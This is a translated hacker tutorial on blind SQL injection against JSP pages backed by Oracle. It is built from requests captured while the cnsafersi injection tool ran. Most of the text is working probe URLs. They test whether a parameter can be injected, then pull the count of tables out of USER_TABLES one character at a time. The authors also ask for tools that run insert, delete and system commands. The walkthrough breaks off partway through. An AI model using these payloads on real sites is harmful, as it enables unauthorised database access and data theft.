JSP + ORACLE injection methods v1.0

Source: Internet
Author: User

Hello everyone, we are pt007 and solaris7, QQ: 7491805/564935. Experts are welcome to get in touch and discuss this with us :).
First of all, thanks to Hua Zi and his friend Hotkey for developing the cnsafersi injection tool for everyone. Without that tool this article would not exist, heh. What follows is an analysis and write-up of the requests captured while the cnsafersi injection tool was running. The article was written in a hurry; if anything is missing, please let us know. We also hope that someone will develop a JSP injection tool with more features: cnsafersi currently only supports select, and we suggest adding insert/delete/update/backup/upload/execute system commands to a new JSP injection tool, using the NBSI feature set as a reference. Reference: How to Develop CnSaferSI.

First, a word about the JSP injection tool used in this article: cnsafersi, developed by Hua Zi and his friend Hotkey. A detailed tutorial on how to use it will follow in the near future.

The following uses the AD table as an example to illustrate the JSP + ORACLE injection process:

1. Determine the injection type (numeric or character)
Detection of character and numeric injection points (I hope someone can refine this further; it is split into two parts, character and numeric). The tool sends each probe as a pair: a condition that is true, which should return the normal page, and its negation, which should not. The three forms below cover a bare numeric parameter, the same with a tautology appended, and a parameter that has to be closed with ) so that the trailing And ()=( rebalances the original query:
http://www.test.net/index_kaoyan_view.jsp?Id=117 And user>char(0)
http://www.test.net/index_kaoyan_view.jsp?Id=117 And user<char(0)
http://www.test.net/index_kaoyan_view.jsp?Id=117 And user>char(0) And 1=1
http://www.test.net/index_kaoyan_view.jsp?Id=117 And user<char(0) And 1=1
http://www.test.net/index_kaoyan_view.jsp?Id=117) And user>char(0) And ()=(
http://www.test.net/index_kaoyan_view.jsp?Id=117) And user<char(0) And ()=(
http://www.test.net/index_kaoyan_view.jsp?Id=117 And str(98)>str(97)
http://www.test.net/index_kaoyan_view.jsp?Id=117 And str(98)<str(97)

http://www.test.net/index_kaoyan_view.jsp?Id=117 And str(98)>str(97) And 1=1
http://www.test.net/index_kaoyan_view.jsp?Id=117 And str(98)<str(97) And 1=1
http://www.test.net/index_kaoyan_view.jsp?Id=117) And str(98)>str(97) And ()=(
http://www.test.net/index_kaoyan_view.jsp?Id=117) And str(98)<str(97) And ()=(

The char() and str() functions above belong to SQL Server and do not exist in Oracle, so none of those probes returns the normal page here. Oracle spells the function CHR, and with it the true probe returns the normal page while its negation does not:
http://www.test.net/index_kaoyan_view.jsp?Id=117 And USER>CHR(0)
http://www.test.net/index_kaoyan_view.jsp?Id=117 And USER<CHR(0)

2. Guess the number of tables and the table names

The table count is a 3-digit number. Each probe compares a number with the length of count(*) over USER_TABLES (the subquery must be wrapped in its own parentheses for Oracle to accept it), narrowing the range until the length is fixed:
http://www.test.net/index_kaoyan_view.jsp?Id=117 And 0<=nvl(length((select count(*) FROM USER_TABLES)),0)   (true)

http://www.test.net/index_kaoyan_view.jsp?Id=117 And 1>=nvl(length((select count(*) FROM USER_TABLES)),0)   (false)

http://www.test.net/index_kaoyan_view.jsp?Id=117 And 2<=nvl(length((select count(*) FROM USER_TABLES)),0)   (true)

http://www.test.net/index_kaoyan_view.jsp?Id=117 And 4>=nvl(length((select count(*) FROM USER_TABLES)),0)   (true)

http://www.test.net/index_kaoyan_view.jsp?Id=117 And 3=nvl(length((select count(*) FROM USER_TABLES)),0)   (true)

The backend is also checked with the Oracle function UNISTR:
http://www.test.net/index_kaoyan_view.jsp?Id=117 And UNISTR(1)>UNISTR(0)

Guessing the digits of the table count
First digit of the table count: 1 (ASCII 49). Each probe compares a number with the ASCII code of one character of the count:

http://www.test.net/index_kaoyan_view.jsp?Id=117 And 52=ascii(substr((select count(*) FROM USER_TABLES),1,1))   (false)
http://www.test.net/index_kaoyan_view.jsp?Id=117 And 52>ascii(substr((select count(*) FROM USER_TABLES),1,1))   (true)

http://www.test.net/index_kaoyan_view.jsp?Id=117 And 49=ascii(substr((select count(*) FROM USER_TABLES),1,1))   (true)


Second digit of the table count: 3 (ASCII 51). The equality probes shown all come back false; the remaining probes were not captured:
http://www.test.net/index_kaoyan_view.jsp?Id=117 And 49=ascii(substr((select count(*) FROM USER_TABLES),2,1))   (false)

http://www.test.net/index_kaoyan_view.jsp?Id=117 And 95=ascii(substr((select count(*) FROM USER_TABLES),2,1))   (false)

http://www.test.net/index_kaoyan_view.jsp?Id=117 And 77=ascii(substr((select count(*) FROM USER_TABLES),2,1))   (false)
